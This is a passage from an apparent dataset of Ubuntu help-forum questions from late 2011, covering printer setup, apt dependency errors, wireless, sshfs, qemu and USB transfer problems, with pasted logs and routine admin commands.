/var/spool/cups/d00008-001 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 0 ] = '' cups_cachedir=/var/cache/cups '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 1 ] = '' cups_datadir=/usr/share/cups '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 2 ] = '' cups_docroot=/usr/share/cups/doc-root '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 3 ] = '' cups_fontpath=/usr/share/cups/fonts '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 4 ] = '' cups_requestroot=/var/spool/cups '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 5 ] = '' cups_serverbin=/usr/lib/cups '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 6 ] = '' cups_serverroot=/etc/cups '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 7 ] = '' cups_statedir=/var/run/cups '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 8 ] = '' home=/var/spool/cups/tmp '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 9 ] = '' path=/usr/lib/cups/filter : /usr/bin : /usr/sbin : /bin : /usr/bin '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 10 ] = '' server_admin=root @ pickwick '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 11 ] = '' software=cups/1.4.6 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 12 ] = '' tmpdir=/var/spool/cups/tmp '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 13 ] = '' user=root '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 14 ] = '' cups_server=/var/run/cups/cups.sock '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 15 ] = '' cups_encryption=ifrequested '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 16 ] = '' ipp_port=631 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 17 ] = '' charset=utf-8 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 18 ] = '' lang=en_us.utf-8 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 19 ] = '' ppd=/etc/cups/ppd/brother-mfc-8880dn.ppd '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 20 ] = '' rip_max_cache=auto '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 21 ] = '' content_type=application/postscript '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 22 ] = '' device_uri=lpd : //brn001ba93a3d6f/binary_p1 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 23 ] = '' printer_info=brother mfc-8880dn '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 24 ] = '' printer_location=brn001ba93a3d6f '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 25 ] = '' printer=brother-mfc-8880dn '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 26 ] = '' cups_filetype=document '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] envp [ 27 ] = '' final_content_type=application/vnd.cups-postscript '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] started filter /usr/lib/cups/filter/pstops ( pid 22189 ) d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] started backend /usr/lib/cups/backend/lpd ( pid 22190 ) d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] state : +connecting-to-device d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] looking up `` brn001ba93a3d6f '' ... d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] page = 612x792 ; 12,12 to 600,780 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] slow_collate=0 , slow_duplex=0 , slow_order=0 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] before copy_comments - % ! ps-adobe-3.0 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] % ! ps-adobe-3.0 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] % % title : ppr test page d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] % % pages : 1 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] % % documentneededresources : font helvetica d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] % % endcomments d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] set job-printer-state-message to `` no % % boundingbox : comment in header ! `` , current level=error d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] before copy_prolog - % % beginprolog d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] before copy_setup - % % beginsetup d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] before page loop - % % page : 1 1 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] copying page 1 ... d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] page : 1 1 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] pagew = 587.9 , pagel = 767.9 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] bboxx = 0 , bboxy = 0 , bboxw = 612 , bboxl = 792 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] pageleft = 12.0 , pageright = 599.9 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] pagetop = 780.0 , pagebottom = 12.1 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] pagewidth = 612.0 , pagelength = 792.0 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] backend returned status 4 ( stop printer ) d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] printer stopped due to backend errors ; please consult the error_log file for details . d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] end of messages d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] printer-state=5 ( stopped ) d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] printer-state-message= '' unable to locate printer 'brn001ba93a3d6f ' ! '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] printer-state-reasons=paused
82019	is there a way to add zoom in and out buttons on evince 's toolbar ?	is there a way to add a `` zoom in '' and `` zoom out '' button in evince 's panel ? the scrolldown menu with 100 % , 85 % , fit to screen etc . is not very userfriendly . unfortunately i ca n't find a settings menu . can you help me ?
82021	upgrading from 9.04 to 11.10 , unmet dependancies	so i have been trying to read around about how to upgrade from the terminal . i am actually sshing through putty to do all this . anyways.. i first tried sudo apt-get update but since jaunty is expired i needed to update my sources . i updated my sources and apt-get update started to work . i then tried apt-get upgrade , and that resulted in some sort of dependency error . i then read apt-get dist-upgrade seems to make it work correctly . so it started installing a whole bunch of things before it got stuck . so finally the error message reads : sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these . the following packages have unmet dependencies : dmsetup : depends : util-linux ( > 2.16 ) but 2.14.2-1ubuntu4 is installed ifupdown : depends : upstart-job depends : initscripts ( > = 2.88dsf-13.3 ) but 2.86.ds1-61ubuntu11 is installed initramfs-tools : depends : util-linux ( > 2.15~rc1 ) but 2.14.2-1ubuntu4 is installed libcompress-raw-bzip2-perl : depends : perl ( > = 5.12.4-1ubuntu2 ) but 5.10.0-19ubuntu1 is installed depends : perlapi-5.12.4 libcompress-raw-zlib-perl : depends : perl ( > = 5.12.4-1ubuntu2 ) but 5.10.0-19ubuntu1 is installed depends : perlapi-5.12.4 libdigest-sha1-perl : depends : perl ( > = 5.12.3-6ubuntu4 ) but 5.10.0-19ubuntu1 is installed depends : perlapi-5.12.3 libhtml-parser-perl : depends : perl ( > = 5.12.3-6ubuntu3 ) but 5.10.0-19ubuntu1 is installed depends : perlapi-5.12.3 libnet-ssleay-perl : depends : perl ( > = 5.12.3-6ubuntu4 ) but 5.10.0-19ubuntu1 is installed depends : perlapi-5.12.3 libsocket6-perl : depends : perl ( > = 5.12.3-6ubuntu4 ) but 5.10.0-19ubuntu1 is installed depends : perlapi-5.12.3 libwww-perl : depends : liblwp-protocol-https-perl but it is not installed depends : libwww-robotrules-perl but it is not installed recommends : libhtml-form-perl but it is not installed recommends : libhttp-daemon-perl but it is not installed module-init-tools : depends : upstart-job mountall : breaks : initscripts ( < 2.88dsf-13.3 ) but 2.86.ds1-61ubuntu11 is installed plymouth : depends : upstart-job recommends : plymouth-theme-ubuntu-text but it is not installed or plymouth-theme udev : depends : upstart-job depends : util-linux ( > 2.15~rc2 ) but 2.14.2-1ubuntu4 is installed e : unmet dependencies . try using -f. when i try to individually install any of the above dependancies , it sort of throws me in a circle . i try installing one or multiple of them and then i get other dependency complains and i try to add or fix those and the other ones complain .
82022	how to configure thunderbird , remove thunderbird from global appmenu e-mail icon	i am a frequent user of ubuntu and recently upgraded from lucid to ubuntu 11.10 . i was not able to properly configure thunderbird , so i switched to evolution . first of all what i want is smooth way to configure thunderbird with all features enabled , like global address list and calendar setting . i also want to know how to remove thunderbird from global appmenu email icon , and how to insert evolution email icon in its place .
82028	nvidia amd64 driver update ( 290.10 certified ) impact on optimus systems and bumblebee ?	before installing bumblebee , many users with optimus enabled systems , when they install the nvidia driver , this latter get on conflict with the integrated graphics driver and then remains inactive . one gets a black or blank screen when booting ... . yesterday , nvidia updated their driver ( nvidia-current ) to version 290.10 certified that fixed many bugs and regressions for amd64 systems , and amongst them : fixed a bug that prevented the driver from loading on some systems with integrated graphics . does it mean that now even though we do not install bumblebee , if we install this update separately , we would be able to use the nvidia card ? does it mean the nvidia card would be on boot recognized by x ? a xinerama scenarion would be possible with an external monitor through the hdmi port connected by default on many systems to the nvidia card ? thanks for your hints or answers see : http : //www.nvidia.com/object/linux-display-amd64-290.10-driver.html
82029	how do i enable wireless on hp pavilion dm1 ?	my wireless network is physically enabled and the `` enable wireless '' appears properly on the top menu , however checking it does n't seem to have any affect . anyone came across this problem ? i have a new hp pavilion dm1-4000 , installed ubuntu 11.10 yesterday . the wireless worked fine yesterday , today i 've got nothing . it also seems to have problems with the wired connection , however i have no idea if it 's related .
82031	how to remove postgresql 8.4 completely ?	i am looking for a way to remove postgresql 8.4 completely ? can any one help me ?
82032	how can i limit a user to access just his folder ? not able to view/cd into any other thing ?	how do i limit a user to access just his folder ? suppose i do n't want the user to be able to cd anywhere else , isit possible ? do i need to chmod the whole system ?
82035	choppy sound via hdmi on mac mini 4,1	i get choppy sound output over hdmi with the command . aplay /usr/share/sounds/alsa/front_center.wav my current configuration can can be found here : alsa-info.sh output sound worked after some tweaking with 10.04 . after upgrade to 11.10 sound stopped working properly . a fresh installation of 11.10 did not change the situation . video over hdmi works without problems . as soon as i run speaker-test i get fluent sound again . workaround to trigger speaker-test after login is obvious but i would like a real fix to that problem . how can i fix this ?
82038	how can i make the rox filer show up in gnome do or the unity dash ?	i have installed rox filer on my ubuntu 11.10 system , but when i open the dash and type rox-filer , it does not show up . also , when i open gnome do , it does not show up until i type the whole name ( gnome do normally shows partial matches ) and does not show an icon .
82041	would a better videocard make ubuntu ui faster ( specifically using gvim ) ?	i have ubuntu 11.10 with unity and an nvidia 7600gs ( it has 256mb memory on board ) . my resolution is 2560x1440 . i work a lot in gvim and the overall experience is that it is slow . for example , it takes long time to switch a tab ( especially , if there are many of them ) . or , if the screen is scrolled down , it obviously lags . when i lowered the resolution , this sluggishness disappeared . so , my question is , would a better videocard help here ?
82045	what 's a simple `` colour picker '' app for gnome ?	i need a small tool to âpickâ a colour anywhere on the screen ( so that i basically get the hex code for it ) . earlier , i 've used kde 's kcolorchooser for this . according to this page , `` gpick '' sounds like what i want , but : $ apt-cache search gpick < returns nothing > any recommendations ?
82048	how do i get orchestra to operate behind an http proxy ?	i 'm setting up an instance of uci in our lab and have had problems setting up orchestra to operate successfully behind an http proxy . i am unable to successfully setup a http proxy and can not run the get-loaders or repo sync commands is there a recommended method to setup up orchestrator/juju to use a proxy server ? alternatively , if there is a known workaround , i 'd welcome that as well any help or guidance would be really appreciated thanks
82053	in cups gui config : error : 'epson-lp-s5500-2 ' requires the 'pstolps5500.sh ' program but i can which it	problem : in oneiric , epson lp-s5500 does n't work with the system settings : printing : add printer configuration , and says : printer 'epson-lp-s5500-2 ' requires the 'pstolps5500.sh ' program but it is not currently installed . please install it before using this printer . i used this printer/ppd file ok with ubuntu 8.10 . here 's the stuff i 've done to get an epson lp-s5500 ( a japan-market laser printer ) working : i installed pstolps5500.sh ( came with ppd file from avasys , link below ) : mcolman @ o960 : ~/dropbox $ pstolps5500.sh error : /usr/local/bin/pstolps5500.sh : un-known paper size so is the problem telling ubuntu cups setup where this helper script is located ? how would i do this ? i also tried adding the printer from the cups interface at localhost:631 , and also from the command line according to instructions that came with the ppd file , which came from http : //www.avasys.jp/lx-bin2/linux/laser/dl1.do here 's 2 commands for setting up direct usb connection printing , but there is n't a command giving for creating a network printer on the local network ( there is a network printer creation command for the lp-s5000 , i tried that and it created a printer but the printer did n't work ... ) : # lpadmin -p lps5500 -e -v usb : /dev/usb/lp0 -m epson-lp-s5500-fm3.ppd # /etc/init.d/cups restart sending test pages to the printer i set up on localhost:631 does n't result in any printing , but the printer clicks . i can see ink levels though ...
82055	eth0 is does not connect when plugged into span / mirror port	i have a hp procurve switch and have configured port 1 on the switch as a span / mirror port . i also have a workstation with 3 interface running ubuntu 10.04 . when i connect eth0 which i have already set to promisc mode to port 1 of the switch , it does not connect . however , when i connect eth0 any other port on the switch ( e.g . 2 , 3 ) it will connect and automatically grab an ip address from dhcp . any idea what went wrong ?
82056	my package version number appears greater yet apt-get does n't select it	backstory : it was determined that when using lxc container vms the nagios nrpe shutdown script when run on the host of the containers would kill the nrpe processes inside the containers . this was remediated by changing the script to use pidfiles instead of searching the process table for the nrpe process . regrettably start-stop-daemon is a c program that resulted from translating a perl script and it shows . there are far too many global varibles in start-stop-daemon.c and although there are some nice blocks of comments there are far to few comments that explain the intent behind variable names such as `` schedule '' ( the string `` schedule '' appears in many contexts . ) the manual page for start-stop-daemon strongly suggests that unless you use the `` -- retry '' option the start-stop-daemon program may return before the process it sent a signal to actually calls exit ( ) and terminates , however it does n't actually state this in plain english . the obtuseness of start-stop-daemon is most likely the reason that the `` fixed '' version of the script includes a dubious comment indicating that sometimes the pid file has not been removed . i can easily see why someone would not understand that he left the -- retry option missing . this bug also causes failures when the script is given the `` restart '' option ; the nrpe daemon will shutdown but not start up again . did i mention that since applying the update our nrpe servers started crashing over and over ? repairing this is why i am doing this work . i have been working on remediating the fix . you can see my current work in this ppa . actual question : the upstream version number of nagios-nrpe-server in lucid-updates is 2.12-4ubuntu1.10.04.1 my ppa uses this version number 2.12-4ubuntu1.10.04.1.1~ppa1~lucid1 i check the rules here and use this test program and i am lead to believe that the version number i use in my ppa is greater than the one in lucid-updates yet when i ran : sudo add-apt-repository ppa : nutznboltz/nrpe-unbreak-lp-600941 sudo apt-get update sudo aptitiude dist-upgrade the replacement package was not installed . i was able to install it using sudo aptitude install nagios-nrpe-server=2.12-4ubuntu1.10.04.1.1~ppa1~lucid1 can anyone explain this behavior ? why did n't my version number appear greater to `` aptitude dist-upgrade '' ? thanks $ cat /etc/apt/preferences package : * pin : release a=lucid-backports pin-priority : 400 package : * pin : release a=lucid-security pin-priority : 990 package : * pin : release a=lucid-updates pin-priority : 900 package : * pin : release a=lucid-proposed pin-priority : 400 $ ls /etc/apt/preferences.d/ $ should not make any difference as a ppa can not be in any of those pockets . i went ahead and bumped the version number in the ppa to 2.12-4ubuntu1.10.04.2~ppa1~lucid1 . i 'll see if that makes a difference . i do notice that lintian complains : w : nagios-nrpe-server : debian-revision-not-well-formed 2.12-4ubuntu1.10.04.2~ppa1~lucid1
82057	skype user interface integration with unity	i found that the user interface of skype is not aligned with the unity theme and lives its own life . trying to play with the options in skype , qt3 and qt4 did n't lead to any result . how do i make skype integrate with the system theme in ubuntu 11.10 ?
82058	running 64 bit ubuntu distribution from 32 bit ubuntu	related to this question how do i run qemu with 64bit processor on a 64bit machine ? , i 'm trying to run latest ubuntu 11.10 64bit distribution under ubuntu 11.04 32 bit using qemu on a core2duo ( 64 bit cpu ) machine , using following qemu parameters with no success . error under qemu : '' this kernel required an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropiate for your cpu '' is n't qemu suppose to emulate a 64 bit machine ? i think i 'm missing something , but i ca n't figure it out . qemu -cpu ( kvm64|core2duo|qemu64 ) -boot d -cdrom ubuntu-11.10-desktop-amd64.iso qemu-system-x86_64 -boot d -cdrom ubuntu-11.10-desktop-amd64.iso here is my uname -m i686 here is my /proc/cpuinfo processor : 1 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu p8400 @ 2.26ghz stepping : 6 cpu mhz : 800.000 cache size : 3072 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm dts tpr_shadow vnmi flexpriority bogomips : 4522.45 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management :
82064	lightweight ubuntu for networking purposes	what is best lightweight ubuntu only for networking purposes ? i 'm doing a project based on ipv6 and i want to test it . lot of mini distributions are there . but actually i could n't find a better one for my project . i want to run 3,4 vms under ubuntu.gui is not necessary . thank you !
82065	ubuntu one not syncing / wrong time after updates	after latest update of 11.10 , ubuntu one is not syncing anymore , even after resetting the password . the error message is : an exception representing an authentication failure . also after this update yesterday , the time is one hour too early and can not be adjusted . any idea ?
82069	update packges error	the exclamation mark at the top appeared and it says that i must update manually . so i clicked check and then it never said that anything failed . after that it still said that my information was 9 days old and the red mark is still there . what can i do ? the error message from running sudo apt-get update is this : w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : some index files failed to download . they have been ignored , or old ones used instead .
82074	pc to usb transfer slow	i 'm having trouble with usb transfer , not with external hard disk . transfer starts with like , for the transfer of 700mb file it starts with 30mb/s and towards the end it stops at 0s and stays put for like 3-4 mins to transfer the last bit . i have tried different usb devices , but no luck . is it a bug ? another important point is , in kubuntu there is no such issue . so is it something related to gnome ? i 'm using ubuntu 11.10 64bit . somebody please help , it 's really annoying . here are the details . pc > > all of my drives are in ext4 . usb > > i tried ext3 , ntfs and fat32 . all having the same problem . here are my usb controllers details : root @ lab : ~ # lspci|grep usb 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) here is an example of one transfer . i connected one of my 4gb usb device . nov 24 12:01:25 lab kernel : [ 1175.082175 ] userif-2 : sent link up event . nov 24 12:01:25 lab kernel : [ 1695.684158 ] usb 2-2 : new high speed usb device number 3 using ehci_hcd nov 24 12:01:25 lab mtp-probe : checking bus 2 , device 3 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-2 '' nov 24 12:01:26 lab mtp-probe : bus : 2 , device : 3 was not an mtp device nov 24 12:01:26 lab kernel : [ 1696.132680 ] usbcore : registered new interface driver uas nov 24 12:01:26 lab kernel : [ 1696.142528 ] initializing usb mass storage driver ... nov 24 12:01:26 lab kernel : [ 1696.142919 ] scsi4 : usb-storage 2-2:1.0 nov 24 12:01:26 lab kernel : [ 1696.143146 ] usbcore : registered new interface driver usb-storage nov 24 12:01:26 lab kernel : [ 1696.143150 ] usb mass storage support registered . nov 24 12:01:27 lab kernel : [ 1697.141657 ] scsi 4:0:0:0 : direct-access sandisk u3 cruzer micro 8.02 pq : 0 ansi : 0 ccs nov 24 12:01:27 lab kernel : [ 1697.168827 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 nov 24 12:01:27 lab kernel : [ 1697.169262 ] sd 4:0:0:0 : [ sdb ] 7856127 512-byte logical blocks : ( 4.02 gb/3.74 gib ) nov 24 12:01:27 lab kernel : [ 1697.169762 ] sd 4:0:0:0 : [ sdb ] write protect is off nov 24 12:01:27 lab kernel : [ 1697.169767 ] sd 4:0:0:0 : [ sdb ] mode sense : 45 00 00 08 nov 24 12:01:27 lab kernel : [ 1697.171386 ] sd 4:0:0:0 : [ sdb ] no caching mode page present nov 24 12:01:27 lab kernel : [ 1697.171391 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through nov 24 12:01:27 lab kernel : [ 1697.173503 ] sd 4:0:0:0 : [ sdb ] no caching mode page present nov 24 12:01:27 lab kernel : [ 1697.173510 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through nov 24 12:01:27 lab kernel : [ 1697.175337 ] sdb : sdb1 after that i initiated one transfer . lsof -p 3575|tail -2 mv 3575 root 3r reg 8,8 1719599104 4325379 /media/misc/the tree of life ( 2011 ) dvdrip xvid-maxspeed/the tree of life ( 2011 ) dvdrip xvid-maxspeed www.torentz.3xforum.ro.avi mv 3575 root 4w reg 8,17 1046347776 15 /media/sree/the tree of life ( 2011 ) dvdrip xvid-maxspeed/the tree of life ( 2011 ) dvdrip xvid-maxspeed www.torentz.3xforum.ro.avi here are the total time spent on that transfer . root @ lab : /media/sree # time mv /media/misc/the\ tree\ of\ life\ \ ( 2011\ ) \ dvdrip\ xvid-maxspeed/ /media/sree/ real 11m49.334s user 0m0.008s sys 0m5.260s root @ lab : /media/sree # df -t|tail -2 /dev/sdb1 vfat 3918344 1679308 2239036 43 % /media/sree /dev/sda8 ext4 110110576 60096904 50013672 55 % /media/misc do you think this is normal ? ? approximately 12 minutes for 1.6gb transfer ? thanks .
82077	establish a virtual network using vm with minimal-distributions	what is best lightweight ubuntu only for networking purposes ? i 'm doing a project related to networking based on ipv6 and i want to test it . so i need to create a ipv6 virtual network in my linux os ( i use ubuntu ) . also i need to create some virtual hosts in my virtual network and setup static ips ( local ips ) for each and every host . and i need to run a terminal on each virtual host . i figured running several instances of a vm is the only way to establish a network . lots of mini-distributions are there , but i could n't find a good one for my project . networking configurations should be there .
82083	connected to access point but no internet connection ?	i am trying to use my school 's wpa enterprise network to access the internet with my three-os laptop . i currently have windows7 , ubuntu11.10 and backtrack5 installed . i can use my home 's wpa2 network without any issues with the 3 os . i can successfully connect to my school 's network with the 3 os but i can only browse the internet with windows7 . ubuntu network-manager and backtrack wicd both say that i am connected to the acces point but i can not browse the internet . i have tried uninstalling network-manager and installing wicd but it did not solve the problem . every time i connect to the access point , i am able to browse the internet for about 10 seconds . i have tried disabling ipv6 i have tried changing dns .
82084	permission denied on sshfs automount	i am trying to set up an sshfs connection between two ubuntu machines , using /etc/fstab so that they automount from the beginning . i have created an .ssh directory in my home dir on both machines , i have created the id_dsa and id_dsa.pub files , and copied the keys over to each machine in a file called authorized_keys . i have set the directory permissions to 700 and the files to 600 . i have edited /etc/fuse.conf so that user_allow_other is uncommented . this is the format of my entry in /etc/fstab on the client machine , which i got from here : sshfs # myname @ www.myhome.com : /home/myname /mnt/sshfs/homebox fuse comment=sshfs , noauto , users , exec , uid=1000 , gid=1000 , allow_other , reconnect , transform_symlinks , batchmode=yes 0 0 however , whenever i try to mount the server , i get this error : fusermount : failed to open /etc/fuse.conf : permission denied fusermount : option allow_other only allowed if 'user_allow_other ' is set in /etc/fuse.conf as mentioned , i have already uncommented user_allow_other , so this error is extra puzzling . what else do i need to do ?
82086	why ca n't i run xfce4-power-manager ?	on my compaq nc8000 , i 'm having a problem running xfce4-power-manager . xfce4-power-manager /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:92 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:147 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:163 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:167 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:516 : murrine configuration option `` gradients '' is no longer supported and will be ignored . rolandixor @ nc8000-1 : ~ $ xfce4-power-manager -- debug /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:92 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:147 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:163 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:167 : murrine configuration option `` gradients '' is no longer supported and will be ignored . /usr/share/themes/sonar-3.2/gtk-2.0/gtkrc:516 : murrine configuration option `` gradients '' is no longer supported and will be ignored . trace [ xfpm-main.c:200 ] xfpm_start ( ) : starting the power manager trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for general-notification trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for lock-screen-suspend-hibernate trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for power-save-on-battery trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for enable-cpu-freq-control trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for critical-power-level trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for show-brightness-popup trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for change-brightness-on-key-events trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for show-tray-icon trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for critical-power-action trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for hibernate-button-action trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for sleep-button-action trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for lid-action-on-ac trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for lid-action-on-battery trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for brightness-level-on-ac trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for brightness-level-on-battery trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for dpms-enabled trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for dpms-on-ac-sleep trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for dpms-on-ac-off trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for dpms-on-battery-sleep trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for dpms-on-battery-off trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for dpms-sleep-mode trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for inactivity-on-ac trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for inactivity-on-battery trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for inactivity-sleep-mode trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for brightness-on-ac trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for brightness-on-battery trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for spin-down-on-ac trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for spin-down-on-battery trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for spin-down-on-ac-timeout trace [ xfpm-xfconf.c:156 ] xfpm_xfconf_load ( ) : using default configuration for spin-down-on-battery-timeout trace [ xfpm-power.c:1053 ] xfpm_power_get_power_devices ( ) : power device detected at : /org/freedesktop/upower/devices/line_power_c136 trace [ xfpm-power.c:1053 ] xfpm_power_get_power_devices ( ) : power device detected at : /org/freedesktop/upower/devices/battery_c139 trace [ xfpm-power.c:1011 ] xfpm_power_add_device ( ) : battery device detected at : /org/freedesktop/upower/devices/battery_c139 : ( ( xfpmdevicetype ) xfpm_device_type_battery ) trace [ xfpm-button.c:179 ] xfpm_button_xevent_key ( ) : grabbed key 124 : ( ( xfpmbuttonkey ) button_power_off ) ( xfce4-power-manager:7025 ) : 